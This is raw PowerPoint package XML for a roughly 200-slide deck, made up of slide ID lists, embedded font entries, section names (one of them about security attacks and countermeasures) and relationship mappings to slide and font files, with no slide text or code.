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4.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image15.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image16.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image28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38.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image39.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image40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7.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image52.jpg" ContentType="image/jpg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  <p:sldMasterId id="2147483672" r:id="rId5"/>
    <p:sldMasterId id="2147483684" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId206"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId207"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="329" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="337" r:id="rId11"/>
    <p:sldId id="335" r:id="rId12"/>
    <p:sldId id="338" r:id="rId13"/>
    <p:sldId id="336" r:id="rId14"/>
    <p:sldId id="318" r:id="rId15"/>
    <p:sldId id="339" r:id="rId16"/>
    <p:sldId id="340" r:id="rId17"/>
    <p:sldId id="341" r:id="rId18"/>
    <p:sldId id="324" r:id="rId19"/>
    <p:sldId id="342" r:id="rId20"/>
    <p:sldId id="343" r:id="rId21"/>
    <p:sldId id="319" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="256" r:id="rId24"/>
    <p:sldId id="532" r:id="rId25"/>
    <p:sldId id="533" r:id="rId26"/>
    <p:sldId id="534" r:id="rId27"/>
    <p:sldId id="535" r:id="rId28"/>
    <p:sldId id="536" r:id="rId29"/>
    <p:sldId id="537" r:id="rId30"/>
    <p:sldId id="538" r:id="rId31"/>
    <p:sldId id="539" r:id="rId32"/>
    <p:sldId id="540" r:id="rId33"/>
    <p:sldId id="541" r:id="rId34"/>
    <p:sldId id="542" r:id="rId35"/>
    <p:sldId id="268" r:id="rId36"/>
    <p:sldId id="269" r:id="rId37"/>
    <p:sldId id="543" r:id="rId38"/>
    <p:sldId id="544" r:id="rId39"/>
    <p:sldId id="272" r:id="rId40"/>
    <p:sldId id="545" r:id="rId41"/>
    <p:sldId id="546" r:id="rId42"/>
    <p:sldId id="547" r:id="rId43"/>
    <p:sldId id="548" r:id="rId44"/>
    <p:sldId id="549" r:id="rId45"/>
    <p:sldId id="550" r:id="rId46"/>
    <p:sldId id="551" r:id="rId47"/>
    <p:sldId id="552" r:id="rId48"/>
    <p:sldId id="553" r:id="rId49"/>
    <p:sldId id="554" r:id="rId50"/>
    <p:sldId id="555" r:id="rId51"/>
    <p:sldId id="556" r:id="rId52"/>
    <p:sldId id="557" r:id="rId53"/>
    <p:sldId id="558" r:id="rId54"/>
    <p:sldId id="559" r:id="rId55"/>
    <p:sldId id="560" r:id="rId56"/>
    <p:sldId id="289" r:id="rId57"/>
    <p:sldId id="290" r:id="rId58"/>
    <p:sldId id="291" r:id="rId59"/>
    <p:sldId id="292" r:id="rId60"/>
    <p:sldId id="293" r:id="rId61"/>
    <p:sldId id="294" r:id="rId62"/>
    <p:sldId id="295" r:id="rId63"/>
    <p:sldId id="296" r:id="rId64"/>
    <p:sldId id="297" r:id="rId65"/>
    <p:sldId id="298" r:id="rId66"/>
    <p:sldId id="299" r:id="rId67"/>
    <p:sldId id="300" r:id="rId68"/>
    <p:sldId id="301" r:id="rId69"/>
    <p:sldId id="302" r:id="rId70"/>
    <p:sldId id="303" r:id="rId71"/>
    <p:sldId id="304" r:id="rId72"/>
    <p:sldId id="305" r:id="rId73"/>
    <p:sldId id="306" r:id="rId74"/>
    <p:sldId id="307" r:id="rId75"/>
    <p:sldId id="308" r:id="rId76"/>
    <p:sldId id="309" r:id="rId77"/>
    <p:sldId id="310" r:id="rId78"/>
    <p:sldId id="311" r:id="rId79"/>
    <p:sldId id="312" r:id="rId80"/>
    <p:sldId id="313" r:id="rId81"/>
    <p:sldId id="314" r:id="rId82"/>
    <p:sldId id="315" r:id="rId83"/>
    <p:sldId id="316" r:id="rId84"/>
    <p:sldId id="317" r:id="rId85"/>
    <p:sldId id="561" r:id="rId86"/>
    <p:sldId id="562" r:id="rId87"/>
    <p:sldId id="563" r:id="rId88"/>
    <p:sldId id="321" r:id="rId89"/>
    <p:sldId id="322" r:id="rId90"/>
    <p:sldId id="323" r:id="rId91"/>
    <p:sldId id="564" r:id="rId92"/>
    <p:sldId id="325" r:id="rId93"/>
    <p:sldId id="326" r:id="rId94"/>
    <p:sldId id="327" r:id="rId95"/>
    <p:sldId id="328" r:id="rId96"/>
    <p:sldId id="565" r:id="rId97"/>
    <p:sldId id="330" r:id="rId98"/>
    <p:sldId id="331" r:id="rId99"/>
    <p:sldId id="332" r:id="rId100"/>
    <p:sldId id="333" r:id="rId101"/>
    <p:sldId id="334" r:id="rId102"/>
    <p:sldId id="566" r:id="rId103"/>
    <p:sldId id="567" r:id="rId104"/>
    <p:sldId id="568" r:id="rId105"/>
    <p:sldId id="569" r:id="rId106"/>
    <p:sldId id="570" r:id="rId107"/>
    <p:sldId id="571" r:id="rId108"/>
    <p:sldId id="572" r:id="rId109"/>
    <p:sldId id="573" r:id="rId110"/>
    <p:sldId id="574" r:id="rId111"/>
    <p:sldId id="575" r:id="rId112"/>
    <p:sldId id="576" r:id="rId113"/>
    <p:sldId id="577" r:id="rId114"/>
    <p:sldId id="347" r:id="rId115"/>
    <p:sldId id="348" r:id="rId116"/>
    <p:sldId id="349" r:id="rId117"/>
    <p:sldId id="350" r:id="rId118"/>
    <p:sldId id="351" r:id="rId119"/>
    <p:sldId id="352" r:id="rId120"/>
    <p:sldId id="353" r:id="rId121"/>
    <p:sldId id="354" r:id="rId122"/>
    <p:sldId id="355" r:id="rId123"/>
    <p:sldId id="356" r:id="rId124"/>
    <p:sldId id="357" r:id="rId125"/>
    <p:sldId id="358" r:id="rId126"/>
    <p:sldId id="359" r:id="rId127"/>
    <p:sldId id="360" r:id="rId128"/>
    <p:sldId id="361" r:id="rId129"/>
    <p:sldId id="362" r:id="rId130"/>
    <p:sldId id="363" r:id="rId131"/>
    <p:sldId id="364" r:id="rId132"/>
    <p:sldId id="365" r:id="rId133"/>
    <p:sldId id="366" r:id="rId134"/>
    <p:sldId id="367" r:id="rId135"/>
    <p:sldId id="368" r:id="rId136"/>
    <p:sldId id="369" r:id="rId137"/>
    <p:sldId id="370" r:id="rId138"/>
    <p:sldId id="371" r:id="rId139"/>
    <p:sldId id="372" r:id="rId140"/>
    <p:sldId id="373" r:id="rId141"/>
    <p:sldId id="374" r:id="rId142"/>
    <p:sldId id="375" r:id="rId143"/>
    <p:sldId id="376" r:id="rId144"/>
    <p:sldId id="377" r:id="rId145"/>
    <p:sldId id="378" r:id="rId146"/>
    <p:sldId id="379" r:id="rId147"/>
    <p:sldId id="380" r:id="rId148"/>
    <p:sldId id="381" r:id="rId149"/>
    <p:sldId id="382" r:id="rId150"/>
    <p:sldId id="383" r:id="rId151"/>
    <p:sldId id="384" r:id="rId152"/>
    <p:sldId id="385" r:id="rId153"/>
    <p:sldId id="386" r:id="rId154"/>
    <p:sldId id="387" r:id="rId155"/>
    <p:sldId id="388" r:id="rId156"/>
    <p:sldId id="389" r:id="rId157"/>
    <p:sldId id="390" r:id="rId158"/>
    <p:sldId id="391" r:id="rId159"/>
    <p:sldId id="392" r:id="rId160"/>
    <p:sldId id="393" r:id="rId161"/>
    <p:sldId id="394" r:id="rId162"/>
    <p:sldId id="395" r:id="rId163"/>
    <p:sldId id="396" r:id="rId164"/>
    <p:sldId id="397" r:id="rId165"/>
    <p:sldId id="398" r:id="rId166"/>
    <p:sldId id="399" r:id="rId167"/>
    <p:sldId id="400" r:id="rId168"/>
    <p:sldId id="401" r:id="rId169"/>
    <p:sldId id="402" r:id="rId170"/>
    <p:sldId id="403" r:id="rId171"/>
    <p:sldId id="404" r:id="rId172"/>
    <p:sldId id="405" r:id="rId173"/>
    <p:sldId id="406" r:id="rId174"/>
    <p:sldId id="407" r:id="rId175"/>
    <p:sldId id="287" r:id="rId176"/>
    <p:sldId id="344" r:id="rId177"/>
    <p:sldId id="345" r:id="rId178"/>
    <p:sldId id="260" r:id="rId179"/>
    <p:sldId id="261" r:id="rId180"/>
    <p:sldId id="264" r:id="rId181"/>
    <p:sldId id="265" r:id="rId182"/>
    <p:sldId id="346" r:id="rId183"/>
    <p:sldId id="263" r:id="rId184"/>
    <p:sldId id="267" r:id="rId185"/>
    <p:sldId id="270" r:id="rId186"/>
    <p:sldId id="271" r:id="rId187"/>
    <p:sldId id="273" r:id="rId188"/>
    <p:sldId id="274" r:id="rId189"/>
    <p:sldId id="275" r:id="rId190"/>
    <p:sldId id="276" r:id="rId191"/>
    <p:sldId id="277" r:id="rId192"/>
    <p:sldId id="278" r:id="rId193"/>
    <p:sldId id="279" r:id="rId194"/>
    <p:sldId id="288" r:id="rId195"/>
    <p:sldId id="280" r:id="rId196"/>
    <p:sldId id="282" r:id="rId197"/>
    <p:sldId id="283" r:id="rId198"/>
    <p:sldId id="284" r:id="rId199"/>
    <p:sldId id="266" r:id="rId200"/>
    <p:sldId id="285" r:id="rId201"/>
    <p:sldId id="286" r:id="rId202"/>
    <p:sldId id="259" r:id="rId203"/>
    <p:sldId id="281" r:id="rId204"/>
    <p:sldId id="531" r:id="rId205"/>
  </p:sldIdLst>
  <p:sldSz cx="12188825" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId208"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId209"/>
      <p:bold r:id="rId210"/>
      <p:italic r:id="rId211"/>
      <p:boldItalic r:id="rId212"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId213"/>
      <p:bold r:id="rId214"/>
      <p:italic r:id="rId215"/>
      <p:boldItalic r:id="rId216"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Euphemia" panose="020B0503040102020104" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId217"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId218"/>
      <p:bold r:id="rId219"/>
      <p:italic r:id="rId220"/>
      <p:boldItalic r:id="rId221"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId222"/>
      <p:bold r:id="rId2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66680D-7575-4074-96BE-1461C0631770}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="262"/>
            <p14:sldId id="329"/>
            <p14:sldId id="258"/>
            <p14:sldId id="337"/>
            <p14:sldId id="335"/>
            <p14:sldId id="338"/>
            <p14:sldId id="336"/>
            <p14:sldId id="318"/>
            <p14:sldId id="339"/>
            <p14:sldId id="340"/>
            <p14:sldId id="341"/>
            <p14:sldId id="324"/>
            <p14:sldId id="342"/>
            <p14:sldId id="343"/>
            <p14:sldId id="319"/>
            <p14:sldId id="320"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Principles" id="{2270924E-7791-4F30-AEF4-9E18E0512044}">
          <p14:sldIdLst>
            <p14:sldId id="256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268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="543"/>
            <p14:sldId id="544"/>
            <p14:sldId id="272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561"/>
            <p14:sldId id="562"/>
            <p14:sldId id="563"/>
            <p14:sldId id="321"/>
            <p14:sldId id="322"/>
            <p14:sldId id="323"/>
            <p14:sldId id="564"/>
            <p14:sldId id="325"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
            <p14:sldId id="565"/>
            <p14:sldId id="330"/>
            <p14:sldId id="331"/>
            <p14:sldId id="332"/>
            <p14:sldId id="333"/>
            <p14:sldId id="334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</p14:sldIdLst>
        </p14:section>
        <p14:section name="Security Attack and COunterMeasure" id="{67E3F68B-62C9-406B-8196-0F0B7B1CA94E}">
          <p14:sldIdLst>
            <p14:sldId id="287"/>
            <p14:sldId id="344"/>
            <p14:sldId id="345"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="346"/>
            <p14:sldId id="263"/>
            <p14:sldId id="267"/>
            <p14:sldId id="270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  <p14:sldId id="288"/>
            <p14:sldId id="280"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="266"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="259"/>
            <p14:sldId id="281"/>
            <p14:sldId id="5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2496">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="1056">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3888">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="240">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="3839">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="527">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="815">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="6863">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="6143">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" pos="47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08" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="792" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide orient="horz" pos="2496"/>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1056"/>
        <p:guide orient="horz" pos="3888"/>
        <p:guide orient="horz" pos="240"/>
        <p:guide pos="3839"/>
        <p:guide pos="527"/>
        <p:guide pos="815"/>
        <p:guide pos="6863"/>
        <p:guide pos="6143"/>
        <p:guide pos="47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1680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38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide132.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide153.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide164.xml"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide185.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1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53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide47.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide68.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide122.xml"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide143.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster2.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide89.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide154.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide175.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide58.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide112.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide133.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide79.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide144.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide165.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide186.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide102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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide69.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide90.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide134.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide155.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide176.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata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7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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide59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51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide145.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide166.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide187.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide114.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide135.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide156.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide177.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font11.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18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31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide125.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide146.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide167.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide188.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2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slide" Target="slides/slide136.xml"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide157.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide178.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font12.fntdata"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata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slide" Target="slides/slide131.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide152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53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide147.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide168.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide173.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide189.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2.fntdata"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide184.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide198.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font13.fntdata"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps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43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide137.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide142.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide158.xml"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide163.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide174.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.fntdata"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata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54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide148.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide169.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide190.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide194.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font14.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide52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44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide138.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide84.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide159.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide180.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42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34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide128.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide74.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide149.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide170.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide191.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide195.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15.fntdata"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide118.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide64.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide85.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide139.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide160.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide181.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font5.fntdata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60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide54.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide75.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide129.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide150.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide171.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide192.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide196.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.fntdata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50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide98.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide119.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide140.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide161.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide182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13" 